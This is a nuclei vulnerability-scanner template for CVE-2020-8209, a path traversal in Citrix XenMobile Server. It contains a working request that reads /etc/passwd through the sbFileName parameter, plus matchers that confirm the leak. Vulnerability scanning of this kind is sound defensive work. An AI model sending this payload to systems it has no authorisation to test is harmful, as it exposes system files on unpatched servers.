nuclei-templates/cves/2020/CVE-2020-8209.yaml

43 lines
1.2 KiB
YAML

id: CVE-2020-8209
info:
name: Citrix XenMobile Server - Local File Inclusion
author: dwisiswant0
severity: high
description: |
Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
reference:
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
- https://support.citrix.com/article/CTX277457
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209
reference:
- https://support.citrix.com/article/CTX277457
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-8209
cwe-id: CWE-22
tags: cve,cve2020,citrix,lfi,xenmobile
requests:
- method: GET
path:
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "fileDownload=true"
- "application/octet-stream"
- "attachment;"
condition: and
# Enhanced by mp on 2022/06/28